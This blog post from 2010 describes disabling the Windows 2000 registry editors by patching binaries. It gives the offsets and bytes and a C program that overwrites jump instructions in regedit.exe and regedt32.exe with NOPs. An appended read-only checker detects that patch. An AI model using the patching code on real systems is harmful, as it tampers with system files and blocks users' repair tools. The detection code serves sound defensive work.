Wednesday, July 21, 2010

Ultimate registry operations - lock registry



Have you ever run into a locked registry that you could not open to fix by hand? This is a headache for many people. I think you already know the principle behind the lock:

Under [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System], the value DisableRegistryTools is set to 1.

There are several ways to unlock it: call the registry API from a program to delete the value directly, make a REG file and import it, write a script, and so on.

Today I will show you how to write a program that locks the registry in a different way. Curious? Follow along.

Experimental environment: Windows 2000
Experiment: lock the registry (this borrows the cracker's idea: the program directly patches the instructions of the registry editor so that it refuses to run).
Implementation: a C program

First, following the cracker's approach, we disassemble regedit.exe and regedt32.exe under WINNT and find the jump. How to obtain this information is not today's topic, so I will not go into detail here. Below are the addresses of the jump instructions I found by disassembly and the bytes to change them to:
1. regedit.exe
Offset address: 0x69CA, instruction bytes: 0x74 0x1A, changed to: 0x90 0x90

2. regedt32.exe
Offset address: 0x10bf2, instruction bytes: 0x74 0x52, changed to: 0x90 0x90

Now we write a program that overwrites the bytes at these two offsets with 0x90 0x90 (0x90 is NOP, which makes the CPU do nothing and continue with the next instruction). Let us see how the program does it.

#include <stdio.h>
#include <stdbool.h>

bool scanreg(const char *file, long offset, int length, char *nop); /* function prototype */

int main(void)
{
    char nop[] = { 0x90, 0x90 };   /* the two NOP bytes to write */
    scanreg("C:\\WINNT\\regedit.exe", 0x69CA, 0x02, nop);                       /* patch regedit.exe under WINNT; 0x02 is the patch length */
    scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedit.exe", 0x69CA, 0x02, nop); /* patch the service-pack copy of regedit.exe */
    scanreg("C:\\WINNT\\system32\\regedt32.exe", 0x10bf2, 0x02, nop);           /* patch regedt32.exe under system32 */
    scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedt32.exe", 0x10bf2, 0x02, nop); /* patch the service-pack copy of regedt32.exe */
    return 0;
}

bool scanreg(const char *file, long offset, int length, char *nop)
{
    FILE *fp = NULL;
    bool result = false;
    if ((fp = fopen(file, "rb+")) != NULL)   /* open the file for reading and writing ("rb" alone would make fwrite fail) */
    {
        fseek(fp, offset, SEEK_SET);         /* move the file pointer to our offset, counted from the start of the file */
        fwrite(nop, length, 1, fp);          /* overwrite the jump instruction with 0x90 0x90 */
        fclose(fp);                          /* close the file */
        result = true;
    }
    return result;
}

Well, this is only a demonstration and applies only to the Windows 2000 system. To cover every Windows version you would analyze the registry editor of each system, call GetVersionEx(LPOSVERSIONINFO lpVersionInfo) at the start of the program to determine which system it is running on, and then call the corresponding patch routine. Wouldn't that cover all of Windows? The method above is published so that everyone can guard against it.
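Since the post publishes the method so that it can be guarded against, here is the check a defender would want: an added example (not code from the post) that opens a binary read-only, reads the bytes at a known offset, and reports whether they are still the original jump, have been replaced by the NOP patch, or are something else entirely. The offsets and instruction bytes are the ones the post gives for Windows 2000; the file names, the `make_sample()` helper and the zero-filled sample images it writes are constructed for this demonstration and are not real registry editors.

```c
/* Added integrity check for the patch offsets described in the post.
 * Offsets and instruction bytes are the post's Windows 2000 values;
 * file names and sample images below are constructed for the demo. */
#include <stdio.h>
#include <string.h>

enum region_state { REGION_ERROR = -1, REGION_ORIGINAL = 0, REGION_PATCHED = 1, REGION_UNKNOWN = 2 };

/* Original instruction bytes stated in the post, and the NOP patch they are replaced with */
static const unsigned char REGEDIT_ORIG[2]  = { 0x74, 0x1A };  /* short je at 0x69CA in regedit.exe */
static const unsigned char REGEDT32_ORIG[2] = { 0x74, 0x52 };  /* short je at 0x10bf2 in regedt32.exe */
static const unsigned char NOP_PATCH[2]     = { 0x90, 0x90 };

/* Compare a region read from an image against the expected original bytes and the NOP patch. */
enum region_state classify_region(const unsigned char *bytes, const unsigned char *expected, size_t n)
{
    if (memcmp(bytes, expected, n) == 0)  return REGION_ORIGINAL;
    if (memcmp(bytes, NOP_PATCH, n) == 0) return REGION_PATCHED;
    return REGION_UNKNOWN;   /* neither: a different build, or some other modification */
}

/* Read n bytes at offset from path and classify them. Returns REGION_ERROR when the
 * file cannot be opened or is too short to contain the whole region (a short read
 * must not be mistaken for "original"). */
enum region_state inspect_file(const char *path, long offset, const unsigned char *expected, size_t n)
{
    unsigned char buf[16];
    FILE *fp;
    enum region_state st = REGION_ERROR;

    if (n > sizeof buf) return REGION_ERROR;
    fp = fopen(path, "rb");                 /* read-only: the check must never modify the file */
    if (fp == NULL) return REGION_ERROR;
    if (fseek(fp, offset, SEEK_SET) == 0 && fread(buf, 1, n, fp) == n)
        st = classify_region(buf, expected, n);
    fclose(fp);
    return st;
}

/* Constructed sample image: zero-filled up to offset, then the given bytes.
 * Stands in for a real binary only to exercise the offset handling. Returns 0 on success. */
int make_sample(const char *path, long offset, const unsigned char *bytes, size_t n)
{
    FILE *fp = fopen(path, "wb");
    if (fp == NULL) return -1;
    for (long i = 0; i < offset; i++) fputc(0, fp);
    fwrite(bytes, 1, n, fp);
    fclose(fp);
    return 0;
}

int main(void)
{
    /* Two constructed images: one with the original jump, one NOP-patched as in the post */
    make_sample("sample_regedit_orig.bin", 0x69CA, REGEDIT_ORIG, 2);
    make_sample("sample_regedit_patched.bin", 0x69CA, NOP_PATCH, 2);

    printf("original image: %d\n", inspect_file("sample_regedit_orig.bin", 0x69CA, REGEDIT_ORIG, 2));
    printf("patched image:  %d\n", inspect_file("sample_regedit_patched.bin", 0x69CA, REGEDIT_ORIG, 2));

    /* For a real check, point inspect_file() at the installed binary, e.g. the post's
     * "C:\\WINNT\\regedit.exe", and treat REGION_PATCHED as evidence of tampering. */
    return 0;
}
```

The result codes map directly onto an incident-response decision: REGION_ORIGINAL means the editor is intact and a locked registry is just the policy value; REGION_PATCHED means the binary itself was altered and should be restored from a trusted copy; REGION_UNKNOWN means the offsets do not belong to this build and a hash comparison against a known-good file is the better test.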
